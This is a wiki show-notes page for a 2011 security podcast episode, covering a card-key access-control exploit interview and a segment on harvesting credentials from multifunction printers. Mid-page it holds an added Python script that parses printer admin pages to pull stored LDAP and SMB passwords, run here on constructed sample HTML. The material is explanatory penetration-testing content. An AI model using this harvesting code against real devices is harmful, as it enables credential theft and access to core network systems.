From Security Weekly Wiki

PaulDotCom Security Weekly - Episode 237 for Thursday March 31st, 2011.

  • SOURCE Boston, April 20-22: Paul and Larry will be there to hang out, talk beer and drink security.
  • SANS Classes
  • DerbyCon: Louisville, Kentucky – September 30th to October 2, 2011, with practically all of PaulDotCom in attendance. Catch our special training session on "How to survive a Dave Rel1k Man Hug".

Guest Interview: Michael Gough (pronounced **Goff**) and Ian Robertson ... The 'Thoughtful Hackers'

Ian is a security guy who spends his time trying to improve the security of his community, state and country. He is Director of Information Security with the State of Texas and one half of the newly dubbed 'Thoughtful Hackers'. You can catch simple, straightforward and actionable advice on his website, CyberSecurityGuy.com.

Michael is a Senior Risk Analyst for the State of Texas and the local Austin BSides lead. When he's not beering and mountain biking, he spends his time blogging at HackerHurricane.com. He is also the author of the Syngress-published "Skype Me!" and "Video Conferencing over IP" books and is the second half of the 'Thoughtful Hackers' security research team.

Security researchers Michael Gough and Ian Robertson have identified a vulnerability affecting a widely used card-key access control system, and produced a first-of-its-kind exploit on a smartphone platform to prove it. Larry called "shenanigans" on this in Episode 235 and they're here to give us the skinny. They'll tell us how they found the vulnerability, how exploitable it is, how the system is fundamentally flawed on several levels, what needs to be done, and what they're doing to help protect others.

  • First off, sorry 'bout the shenanigans, but in this industry oftentimes the proof is in the pudding, and videos are cool but sometimes get overlooked. How do you think the awareness on this issue is working?
  • So, to be frank, what is the issue, and what is Caribou all about?
  • Caribou is for the Android, but, will the underlying exploit work elsewhere?
  • We understand and respect the path you've chosen for disclosure, but how has the experience been working with CERT and the vendor? Based on the status now, do you think the vendor is taking the issue seriously, and will you ever get to (if you choose to) release Caribou?
  • Tell us about some of the other technical challenges with accessing the technology to make the exploit work?
  • How pervasive is this type of problem, in your opinion? How about other vendors? How about embedded and access control systems in general?
  • Why do you think that this particular instance is such a mess? Is it the vendor's fault? The installer's? The customer? Or just a lack of understanding all around?

Guest Tech Segment: Deral Heiland “PercX” and Pete Arzamendi “Bokojan” on Multi Function Printers and PRAEDA

Deral Heiland is a Senior Security Engineer for the foofus.net security team and is co-founder and president of the Ohio Information Security Forum. He's here tonight to discuss his ShmooCon presentation on Multi Function Printer pwnage.

In this presentation they go beyond the common printer issues and focus on harvesting data from multifunction printers (MFPs) that can be leveraged to gain access to other core network systems. By taking advantage of poor printer security and vulnerabilities during penetration testing, they were able to harvest a wealth of information from MFP devices, including usernames, email addresses and authentication information such as SMB, email and LDAP passwords. Leveraging this information, they have successfully gained administrative access to core systems, including email servers, file servers and Active Directory domains, on multiple occasions. They will also explore MFP device vulnerabilities including authentication bypass, information leakage flaws and XSS flaws. Tying this all together, they will discuss the development of an automated process for harvesting the information from MFP devices with the beta release of their new tool 'PRAEDA'.
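As an added example (this is not PRAEDA and not foofus.net code), the script below shows the kind of information-leakage harvesting the segment describes: an MFP's embedded web server echoing a stored LDAP bind password or SMB scan-to-folder password back into the value attribute of a configuration form field, where anyone who can reach the admin page can read it. The two HTML pages, the hostnames, the service-account DN and the password are all constructed for this example, and the field-name heuristics are assumptions for illustration, not anything PRAEDA is documented to use. The second page shows the case a practitioner must handle: a device that masks the stored secret, which yields nothing usable and must not be reported as a leak.

```python
"""Harvest credentials leaked by an MFP's embedded web server.

Added example, not PRAEDA or foofus.net code. It assumes the classic MFP
weakness from the segment: settings pages that echo stored passwords back
into HTML form fields. All sample HTML and values below are constructed.
"""
import re
from dataclasses import dataclass
from html.parser import HTMLParser
from typing import List, Tuple

# Constructed "LDAP settings" page: the bind password comes back in clear text.
LDAP_PAGE_LEAKY = """
<html><body><form method="post" action="/ldap.cgi">
<input type="text" name="ldap_server" value="dc01.corp.example">
<input type="text" name="ldap_port" value="389">
<input type="text" name="ldap_bind_dn" value="CN=svc-mfp,OU=Service Accounts,DC=corp,DC=example">
<input type="password" name="ldap_bind_pw" value="Summer2011!">
<input type="submit" value="Apply">
</form></body></html>
"""

# Constructed "SMB scan-to-folder" page from a device that masks the secret.
SMB_PAGE_MASKED = """
<html><body><form method="post" action="/smbdest.cgi">
<input type="text" name="smb_host" value="fs01.corp.example">
<input type="text" name="smb_share" value="scans">
<input type="text" name="smb_user" value="CORP\\scanuser">
<input type="password" name="smb_pass" value="********">
</form></body></html>
"""

# Field-name heuristics (assumed for this example; vendors differ widely).
HOST_RE = re.compile(r"(server|host|address|ipaddr)", re.I)
USER_RE = re.compile(r"(user|login|account|bind_dn)", re.I)
SECRET_RE = re.compile(r"(pass|pwd|secret)", re.I)


class _InputCollector(HTMLParser):
    """Collect (name, type, value) for every <input> tag on the page."""

    def __init__(self) -> None:
        super().__init__()
        self.inputs: List[Tuple[str, str, str]] = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "input":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        self.inputs.append((a.get("name", ""),
                            a.get("type", "text").lower(),
                            a.get("value", "")))


@dataclass(frozen=True)
class Credential:
    service: str
    host: str
    username: str
    password: str


def is_masked(value: str) -> bool:
    """Empty values and placeholder runs of * or bullets are not leaks."""
    stripped = value.strip()
    return not stripped or set(stripped) <= set("*\u2022")


def _collect(html: str) -> List[Tuple[str, str, str]]:
    c = _InputCollector()
    c.feed(html)
    return c.inputs


def leaked_secret_fields(html: str) -> List[str]:
    """Names of fields carrying a real (unmasked) stored secret."""
    return [n for n, t, v in _collect(html)
            if (t == "password" or SECRET_RE.search(n)) and not is_masked(v)]


def harvest(html: str, service: str) -> List[Credential]:
    """Pair each leaked secret with the host and account on the same form."""
    inputs = _collect(html)
    host = next((v for n, t, v in inputs
                 if t != "password" and HOST_RE.search(n) and v), "")
    user = next((v for n, t, v in inputs
                 if t != "password" and USER_RE.search(n) and v), "")
    return [Credential(service, host, user, v) for n, t, v in inputs
            if (t == "password" or SECRET_RE.search(n)) and not is_masked(v)]


if __name__ == "__main__":
    for name, page, svc in (("ldap", LDAP_PAGE_LEAKY, "ldap"),
                            ("smb", SMB_PAGE_MASKED, "smb")):
        print(name, "leaked fields:", leaked_secret_fields(page))
        for cred in harvest(page, svc):
            print("  ", cred)
```

In a real engagement the pages would be fetched from each device's web interface over the network; the parsing and the masked-value check are the parts that carry over. A harvested LDAP bind or SMB account is exactly the foothold the segment describes, which is why a defender should confirm that their MFPs mask stored secrets and restrict who can reach the admin interface.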

Stories For Discussion

Larry's Stories

Revenge is a dish best served uploaded to YouTube [1]

Paul's Stories